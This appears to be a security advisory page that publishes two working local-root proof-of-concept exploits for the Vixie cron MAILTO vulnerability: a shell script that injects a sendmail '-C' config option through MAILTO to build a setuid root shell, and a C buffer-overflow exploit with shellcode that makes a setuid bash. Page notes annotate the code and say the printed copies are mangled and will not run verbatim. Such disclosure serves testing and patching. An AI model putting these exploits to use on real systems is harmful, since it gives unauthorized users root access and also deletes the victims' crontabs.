‘Two new exploit scripts released for Vixie CronD vulnerability’

Summary

The following two programs can be used to check whether a host's Vixie cron (crond) is exposed to the recently reported vulnerability that lets local users gain root privileges. Both are working proof-of-concept exploits: each ends up with a setuid-root binary on the target, and each leaves artifacts in /tmp, in the invoking user's home directory and in that user's crontab (both finish with `crontab -r`, which deletes the whole crontab, not just the entry they added). Run them only on systems you are authorized to test. For more details about this vulnerability see our article: Buffer overflow in crond

Credit:

‘The first exploit code has been provided by: Michal Zalewski.
The second exploit code has been provided by: jbowie@el8.org


Details

The first exploit is a Bourne shell script (see its `#!/bin/sh` line; it is not a Perl script as originally stated). Its own dependency checks show what it needs: a setuid crontab at /usr/bin/crontab, sendmail at /usr/sbin/sendmail, gcc at /usr/bin/gcc, and a writable /tmp mounted without noexec/nosuid. Note that the listing below was reformatted by the page: the shell's ASCII quotes appear as typographic quotes and the `crontab -` argument as a dash, so it has to be corrected before it will run:

#!/bin/sh
# vixie-cron local root proof of concept (Michal Zalewski).
#
# NOTE(review): this listing has been reformatted by the page — the ASCII
# quotes used by echo/crontab/execl appear as typographic quotes and the
# "crontab -" argument as a dash — so it will not run verbatim as shown.
#
# Flow, as the steps below show: write a private sendmail .cf whose "local"
# mailer is /tmp/vixie-root running as DefaultUser=0:0, install a crontab
# whose MAILTO smuggles "-C/tmp/vixie-cf" into cron's sendmail invocation,
# wait for the job to fire, then run the setuid binary that results.
# Presumably the fix is a cron that does not hand MAILTO to sendmail
# unvalidated — confirm against the linked advisory. Use only on systems you
# are authorized to test.
#
# Two portability notes: "let" and "&>/dev/null" further down are bash
# extensions, not POSIX sh, so /bin/sh must actually be bash for this to
# behave as written.

clear
echo ‘——————————————————————‘
echo ‘Marchew Hyperreal Industries <marchew@dione.ids.pl>’
echo ‘Stumilowy Las Team <100milowy@gdynia.ids.pl>’
echo ‘—————————- presents —————————-‘
echo
echo ‘ -= vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> =-‘
echo
echo ‘[+] Checking dependencies:’
echo -n ‘ [*] vixie crontab: ‘

# crontab must be setuid (-u) and executable: the attack runs entirely
# through the unprivileged user's crontab, so a non-setuid crontab cannot be used.
if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then
echo ‘OK’
else
echo ‘NOT FOUND!’
exit 1
fi

echo -n ‘ [*] Berkeley Sendmail: ‘

# Only existence is checked here; the .cf written below assumes a sendmail
# that honours -C and the V7/Berkeley configuration syntax.
if [ -f /usr/sbin/sendmail ]; then
echo ‘OK’
else
echo ‘NOT FOUND!’
exit 1
fi

echo -n ‘ [*] gcc compiler: ‘

# gcc is invoked later by /tmp/vixie-root, i.e. by root, to build the shell launcher.
if [ -x /usr/bin/gcc ]; then
echo ‘OK’
else
echo ‘NOT FOUND!’
exit 1
fi

# Not checked: whether this cron is actually the affected version, and
# whether /tmp allows executing and honouring setuid bits — both are
# required, since every helper lives in /tmp.
echo ‘ [?] Dependiences not verified:’
echo ‘ [*] proper version of vixie crontab’
echo ‘ [*] writable /tmp without noexec/nosuid option’
echo ‘[+] Exploit started.’

echo ‘[+] Setting up .cf file for sendmail…’

# Attacker-controlled sendmail configuration. QueueDirectory=/tmp keeps the
# queue files (df*/qf*, cleaned up below) where this user can write,
# DefaultUser=0:0 makes the mailer run as root, the single R rule routes
# every recipient to the "local" mailer, and that mailer's program (P=) is
# the /tmp/vixie-root script written next.
cat >/tmp/vixie-cf <<__eof__
V7/Berkeley

O QueueDirectory=/tmp
O DefaultUser=0:0

R$+ $#local $: $1 regular local names

Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
T=DNS/RFC822/X-Unix,
A=vixie-root
__eof__

echo ‘[+] Setting up phase #1 tool (phase #2 tool compiler)…’

# Phase 1, run as root by sendmail: compile the launcher and mark it
# setuid+setgid (6755) so it is usable by the unprivileged caller afterwards.
cat >/tmp/vixie-root <<__eof__
#!/bin/sh

gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d
chmod 6755 /tmp/vixie-own3d
__eof__

chmod 755 /tmp/vixie-root

echo ‘[+] Setting up phase #2 tool (rootshell launcher)…’

# Phase 2: the setuid binary itself. It forces uid/gid 0, deletes its own
# file so a second run is impossible, and execs an interactive /bin/sh.
cat >/tmp/vixie-own3d.c <<__eof__
main() {
setuid(0);
setgid(0);
unlink(‘/tmp/vixie-own3d’);
execl(‘/bin/sh’,’sh’,’-i’,0);
}
__eof__

echo ‘[+] Putting evil crontab entry…’

# The trigger. "nonexist" fails every minute, so cron mails its output to
# MAILTO; the MAILTO value is passed to sendmail as-is, and "-C/tmp/vixie-cf"
# is taken by sendmail as a config-file option rather than as an address.
# This REPLACES the user's existing crontab (crontab -) — nothing is merged.
crontab – <<__eof__
MAILTO=’-C/tmp/vixie-cf dupek’
* * * * * nonexist
__eof__

echo ‘[+] Patience is a virtue… Wait up to 60 seconds.’

ILE=0

echo -n ‘[+] Tick.’

# Poll for the launcher. 50 iterations of 2 s is up to 100 s, not the
# 60 s printed above; the loop is cut short (ILE=1000) once the binary appears.
while [ $ILE -lt 50 ]; do
sleep 2
let ILE=ILE+1
test -f /tmp/vixie-own3d && ILE=1000
echo -n ‘.’
done

echo
echo ‘[+] Huh, done. Removing crontab entry…’

# Removes the user's entire crontab, not just the entry installed above.
crontab -r

echo ‘[+] Removing helper files…’

# df*/qf* are the sendmail queue files left in /tmp by QueueDirectory=/tmp.
# If the launcher never appeared, /tmp/vixie-own3d.c is still removed here
# but the crontab-triggered job may already be gone, so nothing further runs.
rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null

echo ‘[*] And now…’

# The launcher unlinks itself on first execution (see phase 2 above).
if [ -f /tmp/vixie-own3d ]; then
echo ‘[+] Entering root shell, babe :)’
echo
/tmp/vixie-own3d
echo
else
echo ‘[-] Oops, no root shell found, patched system or configuration problem :(‘
fi

echo ‘[*] Exploit done.’

The second is a C program. The listing below has also been mangled by the page: string escapes have lost their backslashes (`\n` and `\xNN` appear as bare `n` and `xNN`, so the crontab line, the helper shell script and the shellcode are all printed incorrectly) and ASCII quotes appear as typographic quotes. It will not compile as shown, and the printed shellcode bytes should not be taken as the original payload:

/*
* VixieCron 3.0 Proof of Concept Exploit – w00w00
*
* Not only does Paul give up root with this one, but with his creative use of
* strtok() he actually ends up putting the address of our shellcode in eip.
*
* Many Thanks: Cheez Wiz, Sangfroid
* Thanks: stran9er, Shok
* Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
* Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web
* defacement group here>
*
* Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
*
* -jbowie@el8.org
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>

/*
 * Payload appended to the oversized MAILTO line that main() writes.
 *
 * NOTE(review): this listing appears to have lost its backslashes — the
 * byte escapes read "xeb" where the source would have had "\xeb" — so as
 * printed this is an ordinary text string, not machine code. The readable
 * tail ("w00w00:..." and "/tmp/w00w00") suggests the intent is a small stub
 * that runs the /tmp/w00w00 helper script main() creates; treat that as
 * inferred, not verified from this copy.
 */
char shellcode[] =
‘xebx40x5ex89x76x0cx31xc0x89x46x0bx89xf3xeb’
‘x27w00w00:Ifwewerehackerswedownyourdumbassx8dx4e’
‘x0cx31xd2x89x56x16xb0x0bxcdx80xe8xbbxffxff’
‘xff/tmp/w00w00’;

/*
 * Entry point: stage the crontab and helper script, install the crontab,
 * wait for cron to produce a setuid bash in the caller's home directory,
 * then exec it.
 *
 * NOTE(review): as printed, every string literal here uses typographic
 * quotes and has lost its backslash escapes ("n" for "\n"), so this copy
 * does not compile; the comments describe the evident intent.
 * argc/argv are unused. Nothing below is checked for failure.
 */
int
main(int argc,char *argv[])
{
FILE *cfile,*tmpfile;
struct stat sbuf;
struct passwd *pw;
int x;

/* NOTE(review): getpwuid() may return NULL; pw->pw_dir is used unchecked. */
pw = getpwuid(getuid());

/* All relative paths below (./cronny, ./bash) are in the caller's home. */
chdir(pw->pw_dir);
/* NOTE(review): both fopen() results are used without a NULL check. */
cfile = fopen(‘./cronny’,’a+’);
tmpfile = fopen(‘/tmp/w00w00′,’a+’);

/*
 * The crontab: MAILTO= followed by 96 copies of "w00w00 " as filler and
 * then the shellcode, so the overlong MAILTO value overruns cron's buffer,
 * plus one job ("date" every minute) to make cron process the entry.
 * Opened with "a+", so a pre-existing ./cronny is appended to, not replaced.
 */
fprintf(cfile,’MAILTO=’);
for(x=0;x<96;x++)
fprintf(cfile,’w00w00 ‘);
fprintf(cfile,’%s’,shellcode);
fprintf(cfile,’n* * * * * daten’);
fflush(cfile);

/*
 * The helper the payload is meant to run as root: copy /bin/bash into the
 * caller's home and mark the copy setuid root (4755).
 */
fprintf(tmpfile,’#!/bin/shncp /bin/bash %snchmod 4755 %s/bashn’, pw->pw_dir,pw->pw_dir);
fflush(tmpfile);

fclose(cfile),fclose(tmpfile);

/* Execute bits only (0111): the helper has no read bits after this. */
chmod(‘/tmp/w00w00’,S_IXUSR|S_IXGRP|S_IXOTH);

if(!(fork())) {
/* Child: install ./cronny as this user's crontab (replacing any existing one). */
execl(‘/usr/bin/crontab’,’crontab’,’./cronny’,(char *)0);
} else {
printf(‘Waiting for shell be patient….n’);
/*
 * Parent: poll every 5 s until ./bash exists. There is no timeout, so on
 * a patched system (or if the crontab exec above failed) this never ends.
 */
for(;;) {
if(!(stat(‘./bash’,&sbuf))) {
break;
} else { sleep(5); }
}
/*
 * Second fork: the parent execs the setuid bash; the child waits 5 s,
 * then removes the helper, the setuid copy, the crontab file and the
 * user's whole crontab (crontab -r).
 * NOTE(review): fork() returning -1 is also non-zero, so on fork failure
 * the parent branch runs and no cleanup happens at all — the setuid-root
 * bash stays in the home directory. Likewise if the child dies before its
 * remove() calls.
 */
if((fork())) {
printf(‘Thank you for using w00warez!n’);
execl(‘./bash’,’bash’,(char *)0);
} else {
remove(‘/tmp/w00w00’);
sleep(5);
remove(‘./bash’);
remove(‘./cronny’);
execl(‘/usr/bin/crontab’,’crontab’,’-r’,(char *)0);
}
}
}’
